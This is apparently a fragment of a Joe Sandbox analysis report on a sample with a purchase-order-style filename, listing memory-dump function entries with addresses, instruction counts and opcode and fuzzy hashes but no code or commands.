Source File: 00000000.00000002.1316192633.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b00000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f4b78788f86af42941b964268027871dd7279badaab1ec1512b30678e90ba22
Instruction ID: a7a3ae6c3783af312d037d5635c11b92feeda480cc5102fc69131ef109a36ecb
Opcode Fuzzy Hash: 0f4b78788f86af42941b964268027871dd7279badaab1ec1512b30678e90ba22
Instruction Fuzzy Hash: 80E09274804104EBC700DEA4D847B6DBBF9EB86200F1095998C0557381C6316E42CB41

Function 05B0A738 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1316192633.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b00000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a4e320c007d5e277bec8cc6e76cb03bedac6efb0c56916e8c7743ee8993c07df
Instruction ID: 936afe8221ce323b2d46d1ca5f605fd76fa920d2aa889d156ac8740a655b24ac
Opcode Fuzzy Hash: a4e320c007d5e277bec8cc6e76cb03bedac6efb0c56916e8c7743ee8993c07df
Instruction Fuzzy Hash: 31F0A936508248EFCB01CF84CA40BA97F72EB09300F09D4C9ED085B2A2C633AD22EB40

Function 05B07000 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1316192633.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b00000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2170a14af46bbd4319b7dde62a5d0ed2a5d96fffef5cec44bf0ee78098b63560
Instruction ID: 6021ea950fe68e25bc4acf3b3009f3850c7bd83eac36cfb6eb25ddb55940337f
Opcode Fuzzy Hash: 2170a14af46bbd4319b7dde62a5d0ed2a5d96fffef5cec44bf0ee78098b63560
Instruction Fuzzy Hash: 6FF03070D08208AFC750DFA8D84469DFBF5FB48300F1081EE981897381EA316A42CF40

Function 0584A5B8 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1315256889.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5840000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6abd5c0ba2429654139f0a8cc7322bdb4561c593e8da231e9096dc3c4bf4ca82
Instruction ID: cc489e3ded4b06bc0f29d3ffd9df88ce56be4f775b130939a879b3f7a8b81e21
Opcode Fuzzy Hash: 6abd5c0ba2429654139f0a8cc7322bdb4561c593e8da231e9096dc3c4bf4ca82
Instruction Fuzzy Hash: 29F08534408248EFCB01CFA4D808BAABBB6BF0A300F118098EC455B2A1C7349E50EF90

Function 0584BF79 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1315256889.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5840000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40031aea1d3dfe431bbdd28450d31ff336f45ebb56309bb96d58abdb7b0da881
Instruction ID: 5027f8b780a5bcc57af05a136cb589a7e833741830dcbfb7b372576561226f44
Opcode Fuzzy Hash: 40031aea1d3dfe431bbdd28450d31ff336f45ebb56309bb96d58abdb7b0da881
Instruction Fuzzy Hash: 9AF0F270904308AFCB84DFA9D84569CBBB4EB89210F10C1AA981993290DB319E42CF40

Function 05B02D41 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1316192633.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b00000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ce215944f3dff5d42d424a50f200ec8c4bbca985502482cd5dad35ddfd878fe6
Instruction ID: b4b05081593a3cbfb075970b1245f9b04369b6c1ff64434b172fb0333d60ec51
Opcode Fuzzy Hash: ce215944f3dff5d42d424a50f200ec8c4bbca985502482cd5dad35ddfd878fe6
Instruction Fuzzy Hash: B8E0DF3890A208ABC700DBA4E946BACFBB9EB46305F50C2D9CC0567382CA31AD07CB41

Function 05B09F90 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1316192633.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b00000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 119646e61b8ea540fec4c625299269abf87902f0290aad162636ace5587f21e4
Instruction ID: 36799b2f2ffbdc5d9f6bbe71b519b3c11af247f78a5a3f014aada6e57095dd69
Opcode Fuzzy Hash: 119646e61b8ea540fec4c625299269abf87902f0290aad162636ace5587f21e4
Instruction Fuzzy Hash: 27F08C75909249EFDB05CF90D840A99BF72EB46300F1090DAEC15172A1C372AA65EF11

Function 05B00698 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1316192633.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b00000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f3957474331d0e0f2f1866cdff94ac4fa8ea7fe2e99f5e23cd6b31a181dc820d
Instruction ID: e82e27a9d3ce360898e1025b15b26d2cab0fcc2ace5e843947f0099cd1bdd5d6
Opcode Fuzzy Hash: f3957474331d0e0f2f1866cdff94ac4fa8ea7fe2e99f5e23cd6b31a181dc820d
Instruction Fuzzy Hash: 09F0A0309041499BC700DFA8C851BA8FBF1EF46314F24C1C9C8299B392C3329A43CF00

Function 05B0A9A3 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1316192633.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b00000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b36dc24dc365ac0f5b16f13236503db9ebe1c9860ced3d0a5da6d18bac50ccef
Instruction ID: e710e20364fafc63286c874227ee9335421c34f20b918a56c86c66238304aa87
Opcode Fuzzy Hash: b36dc24dc365ac0f5b16f13236503db9ebe1c9860ced3d0a5da6d18bac50ccef
Instruction Fuzzy Hash: 5BF0E774A00129CFCB64DF14D890F9CB7B1BB4A300F4054E9D40EA7280DB31AE82CF04

Function 05B0980B Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1316192633.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b00000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5043f8449f26924a90effc8bbed543feb140d4a00949ec7f430fc5e48ee50bdc
Instruction ID: a7e9dbb3f85448f74f34afcf60f8d32a403132063f03c0df3ce687b0a9146bef
Opcode Fuzzy Hash: 5043f8449f26924a90effc8bbed543feb140d4a00949ec7f430fc5e48ee50bdc
Instruction Fuzzy Hash: 1CF0C474A11119CFDB64EF68D990E9DBBB1FB48300F20816AD449A3399DB306D46DF40

Function 05B17318 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1316241056.0000000005B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b10000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6abde9b5e9fc8ac7ccdbb5c7787bf38753df8bf98b271be2bd70f7e36cea9629
Instruction ID: 246b88de8f786a556c577d0375c948414092d7d48033e37813bc7562612d30c3
Opcode Fuzzy Hash: 6abde9b5e9fc8ac7ccdbb5c7787bf38753df8bf98b271be2bd70f7e36cea9629
Instruction Fuzzy Hash: A5E04F317013195BD7209A1AFC84D4BFFAEEFC0265710CA3AE50A8B225DE70BD0A87D4

Function 00D25F75 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1290469285.0000000000D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d20000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1b277b64214868ee254bc7768c599d940baaef84d6a0af45df72a6440da06511
Instruction ID: caabaa1d5458361397793f1aab4e2474bec982dc8dee8d6e3c71f0891da5b582
Opcode Fuzzy Hash: 1b277b64214868ee254bc7768c599d940baaef84d6a0af45df72a6440da06511
Instruction Fuzzy Hash: D9014274A01329CFEB64DF25D948B98BBB0FB9A305F5444E6E40AF2A40DB744E80CF12

Function 0584C991 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1315256889.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5840000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 18e251b8bf3d31b4fde02749afe2576055cb6cb50fb2b8cd0afbc5009391b049
Instruction ID: 27ad48be6b172df8c7f076272e1b8bd505650ead26fefde910c3441c115b8716
Opcode Fuzzy Hash: 18e251b8bf3d31b4fde02749afe2576055cb6cb50fb2b8cd0afbc5009391b049
Instruction Fuzzy Hash: 09E09A71A0A30CABCB00DFA0A85266CBF79AB52209F0041EADC0857280EB314E40CF92

Function 05843998 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1315256889.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5840000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 10cc06aa2c3cc7bd979d194d552b87a919b81b4ceb3e712ebc81857bdf317808
Instruction ID: 948ebe17e6c6218a3ae116f5ec1106af128b7487bfd021fc50ebf547b51b90ae
Opcode Fuzzy Hash: 10cc06aa2c3cc7bd979d194d552b87a919b81b4ceb3e712ebc81857bdf317808
Instruction Fuzzy Hash: F6E06D38914248EFC740DFA8D8457ACBFB4AB0A200F9044D4D945D7360DA305E41DF50

Function 0584CA51 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1315256889.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5840000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 200a35d17e7ddd8c35126467937b64164ec69e7c94002d209af6b3755c2e1761
Instruction ID: 3b1d81bcdc3e502d46731d471bc34139f2a8a6958250a8021c8c897023173883
Opcode Fuzzy Hash: 200a35d17e7ddd8c35126467937b64164ec69e7c94002d209af6b3755c2e1761
Instruction Fuzzy Hash: 61F015B4E05208EFCB40DFA9D881AADBBF8EB49204F1080AA9C18E7341D6319E01CF90

Function 05B0D508 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1316192633.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b00000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8b12b1bb290f32fb2bc6c8fba6a0c386d2b4c2975ba226bd9ff0ffcf68e90149
Instruction ID: 5af57b586a8d55be34e99a55bf05edeb70f56c3216b638e4e0bcb36e5ad08b29
Opcode Fuzzy Hash: 8b12b1bb290f32fb2bc6c8fba6a0c386d2b4c2975ba226bd9ff0ffcf68e90149
Instruction Fuzzy Hash: 7DF0F235904208EFCB00CF98D840AACBBB6EB49300F108099AD1952290D732AA61EF41

Function 05B093B9 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1316192633.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b00000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d2fa97a45aed3851f6ce12f58c4896f85a8755f464c8305140c4aa5519042b4b
Instruction ID: 003b28c9ea2e0d103813626fb5de69dcb01e84bbf10a5a0402136b6dfdcc9ccb
Opcode Fuzzy Hash: d2fa97a45aed3851f6ce12f58c4896f85a8755f464c8305140c4aa5519042b4b
Instruction Fuzzy Hash: 3DF06D75948148DFC700CFA8C944AAC7FB5FF4A305F1551EAE55A973E2C6309A00DF00

Function 05CAEDA0 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1316660370.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c90000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8954838f25df73624867dbff402e93497e69ca19d9aafe08e1188aba0dcdbd04
Instruction ID: 298ffa45b1dd69f6d1cecc4a8d6e2b81d8488ffbcb2592e2a44f89a2d6cd6c77
Opcode Fuzzy Hash: 8954838f25df73624867dbff402e93497e69ca19d9aafe08e1188aba0dcdbd04
Instruction Fuzzy Hash: F0F0ED75E04248EFC784DFA9D840AADFBF9EB49304F10C4AA9959D3381D6359A41DF90

Function 05C980EA Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1316660370.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c90000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 84c1316733314bbf10bcb5245cdd35e868fd10593a95bcd814fdff701405635e
Instruction ID: b53882c5e165b038db4ae29dc391c0ee6b304411d72351773e3edc6c9d2a1ecf
Opcode Fuzzy Hash: 84c1316733314bbf10bcb5245cdd35e868fd10593a95bcd814fdff701405635e
Instruction Fuzzy Hash: 9BF01D74B052288FCB54DF58C845A9A77B1EB8A310F1581E4A419A37A4CA349E81DF11

Function 0584D48F Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1315256889.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5840000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 73655a8152ae1307eef12da64faa6105fae12a89aa71008313186de3c09c35be
Instruction ID: 930ce2566d7088dc3048ae025faff92033dd6cca22fbf3bb551b61b1fdf6d685
Opcode Fuzzy Hash: 73655a8152ae1307eef12da64faa6105fae12a89aa71008313186de3c09c35be
Instruction Fuzzy Hash: 78E09272E51318EBDB41DF60D94575CBF76EB41200F1144A4EC09DB241FA32AE019B88

Function 0584B499 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1315256889.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5840000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b69a48d91c85a259656df77933f65083e35a914ccb0c93559fd3bdbc0b75da9e
Instruction ID: fbe5d828df74dc1990d68323eb5607d2414c3dd140480bcacccb0b4f1dbdeb4e
Opcode Fuzzy Hash: b69a48d91c85a259656df77933f65083e35a914ccb0c93559fd3bdbc0b75da9e
Instruction Fuzzy Hash: 34E0ED70914208EFC784DFA8E541798FBB4FB05615F208599DC09D7251DB359E46DF50

Function 05B07C0A Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1316192633.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b00000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fbe5d4cbffdc2e3a24271a71d5be0295cb53a865f1425d764f6e83bb1b1f085b
Instruction ID: dfd2ad5e0663ef3fa93d643b318cd8142e9076b436bc386c582a2aec742a9cb9
Opcode Fuzzy Hash: fbe5d4cbffdc2e3a24271a71d5be0295cb53a865f1425d764f6e83bb1b1f085b
Instruction Fuzzy Hash: 6DF0E5B1848248AFC710CFA4C40069DFFB1FB11321F1081EE9854562D1D7356A42DF50

Function 05B09FA0 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1316192633.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b00000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c456960ebc249fb141ead5e180241c0cb8affb977b707a049254dc5b7967e512
Instruction ID: 25d8431b5afe50341af0dc971c53162e9d2a178d2b263a2ebbc19524ba3f1cfa
Opcode Fuzzy Hash: c456960ebc249fb141ead5e180241c0cb8affb977b707a049254dc5b7967e512
Instruction Fuzzy Hash: 9EE0E535908208FBCB05DF94D9409ADBFB6FB49300F109099ED05272A1C732AA62EB91

Function 05B05F40 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1316192633.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b00000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8e4e859c1fef03fbe3a26e90e10f1faddb5bdbee810c729e1d3c0f81da915a5c
Instruction ID: 68f2d9e1b85320ab5186e1de1fb8b6a0970d3020f15f48d04e275c075d543557
Opcode Fuzzy Hash: 8e4e859c1fef03fbe3a26e90e10f1faddb5bdbee810c729e1d3c0f81da915a5c
Instruction Fuzzy Hash: CEE0DF76A491449BC711C6A4D9521ACFFA0DB0A21AF2881CAD88C83383C1369F038680

Function 05B0A748 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1316192633.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b00000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c456960ebc249fb141ead5e180241c0cb8affb977b707a049254dc5b7967e512
Instruction ID: da4cba9af71a5ed3edf09a4db05593dee73b3e7eda4f034e104581924f4e271c
Opcode Fuzzy Hash: c456960ebc249fb141ead5e180241c0cb8affb977b707a049254dc5b7967e512
Instruction Fuzzy Hash: EFE0E535908208FFCB05DF94D940AADBF7AFB49300F10D499ED05272A1D732AE62EB91

Function 05B03EE8 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1316192633.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b00000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 46956772d7bd98802eacc9bf8cb98e294a34af42cc930f33fcba24bf518e6dbd
Instruction ID: c45cfb5ba8df13cdc65006edb8365aa36bfbd2b009d55b6ff0ef05bb77e68425
Opcode Fuzzy Hash: 46956772d7bd98802eacc9bf8cb98e294a34af42cc930f33fcba24bf518e6dbd
Instruction Fuzzy Hash: 66E0927090A284EFCB05DBA4D94455CBFB0EF43314F1496DED858573E2CA315E49DB41

Function 05B08E48 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1316192633.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b00000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 29958fbde2ae62d525d70d738e68e9afa4c6cf6bd8683b0a37f22e3f0570e0ea
Instruction ID: 2bfb9ac01ceb53b3aceda4ea5fef4d254c4ce2f8c4c69aa1f6c65698a3ec377b
Opcode Fuzzy Hash: 29958fbde2ae62d525d70d738e68e9afa4c6cf6bd8683b0a37f22e3f0570e0ea
Instruction Fuzzy Hash: C7E0DF72C00208BFC700EFF9E80479ABBBAEB05201F1040EAE00187180EA305A409BA5

Function 05B07950 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1316192633.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b00000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e2086954ae499e7ae8e74510b368a8515a62d7caa7d314f62fce3a992b128e5a
Instruction ID: 4012f84d7a6deffcfe4f94e78f6ec4c0974632d176c2b31dbd92ef6eb9138b28
Opcode Fuzzy Hash: e2086954ae499e7ae8e74510b368a8515a62d7caa7d314f62fce3a992b128e5a
Instruction Fuzzy Hash: 34E01230849348AFCB41DFB898557ADBFF99B06201F5050E9C48593291EA306A45CB55

Function 05B0C940 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1316192633.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b00000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4ff7132b0483f22e46934c55aadddc478bef6350bf834ccd302174e7223426ae
Instruction ID: c201d27b96f4d78e77ebb8a7b8f2149a8b550ac19b6a31f500b02353668680c9
Opcode Fuzzy Hash: 4ff7132b0483f22e46934c55aadddc478bef6350bf834ccd302174e7223426ae
Instruction Fuzzy Hash: 2DF01535804208EBCB01CF94C900AACFFB5EB49300F10C19AA91952290C7329E51EF80

Function 05CAA9D8 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1316660370.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c90000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 37a4d7a36d9b913bb5fb3b0d3d638ea4cdf0fff4e18bd6d18f9e12f37f4b9fc7
Instruction ID: 9c3aa5a2c9b50cbf381c35cf91bbb0fc844c0d35bfd7124ee6b5924498bce5ad
Opcode Fuzzy Hash: 37a4d7a36d9b913bb5fb3b0d3d638ea4cdf0fff4e18bd6d18f9e12f37f4b9fc7
Instruction Fuzzy Hash: 42E0C975D04208EFCB44DFA9D840A9CFBF5EB48304F10C5AA981993350D6319A91DF80

Function 05CA5070 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1316660370.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c90000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 37a4d7a36d9b913bb5fb3b0d3d638ea4cdf0fff4e18bd6d18f9e12f37f4b9fc7
Instruction ID: faac5c2e7e0c24fba184fa0d452d2afe2515a6590b7504e652154240ee5039d7
Opcode Fuzzy Hash: 37a4d7a36d9b913bb5fb3b0d3d638ea4cdf0fff4e18bd6d18f9e12f37f4b9fc7
Instruction Fuzzy Hash: 10E0C975D04208EFCB44DFA9D844AACFBF5EB48304F10C4AA981993351D6319A51DF80

Function 05CA9208 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1316660370.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c90000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 37a4d7a36d9b913bb5fb3b0d3d638ea4cdf0fff4e18bd6d18f9e12f37f4b9fc7
Instruction ID: e53fcbdf0ed7b8e1e47326c89cdb39f08b2af4b89fb961576bb5170709073f9e
Opcode Fuzzy Hash: 37a4d7a36d9b913bb5fb3b0d3d638ea4cdf0fff4e18bd6d18f9e12f37f4b9fc7
Instruction Fuzzy Hash: 10E0ED75D04208EFCB44DFA9D841A9CFBF5FB49304F10C5AA981993350E7319A51DF41

Function 05B11F70 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1316241056.0000000005B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b10000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e2b36526e59b7b59a95a740f154b431bfd308eec8e8ebc3fdcd1d668e105f0a3
Instruction ID: aa974658d84302c9eb2bf45c9b2398f484092683ec85815787193806d404f5bf
Opcode Fuzzy Hash: e2b36526e59b7b59a95a740f154b431bfd308eec8e8ebc3fdcd1d668e105f0a3
Instruction Fuzzy Hash: 75E02630B003149BE760A66C4806B713399AF49241F9000A4EF06DF2C0CAA1FC02C35B

Function 05B1EEF0 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1316241056.0000000005B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b10000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 773a501890a2bf871b1389def93a8c9e5159681abc31ff885e2e5e9f919ad1b5
Instruction ID: d3d2d54aa69a14c4ed0253a222cb3813ea187f3a2647fb9c6a792595478dd85c
Opcode Fuzzy Hash: 773a501890a2bf871b1389def93a8c9e5159681abc31ff885e2e5e9f919ad1b5
Instruction Fuzzy Hash: 2AE08C210ACAC04FF3069760EC6BB817F54A342319F18808FD944460E3CF7E0446C782

Function 00D24C43 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1290469285.0000000000D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d20000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a13a84907ff51210c7aa4040d7e3157c3739ff35631f22369c96a7d6b5b54314
Instruction ID: e22cac33b1652c282eedaed8c2c6a8a9a5249bb0a96e9537dd73f2e0450f2f32
Opcode Fuzzy Hash: a13a84907ff51210c7aa4040d7e3157c3739ff35631f22369c96a7d6b5b54314
Instruction Fuzzy Hash: 06F0747490226AEFEB64CF64DD487EDBBB0EB59319F1044D6E40DA2241CB348AC4CF19

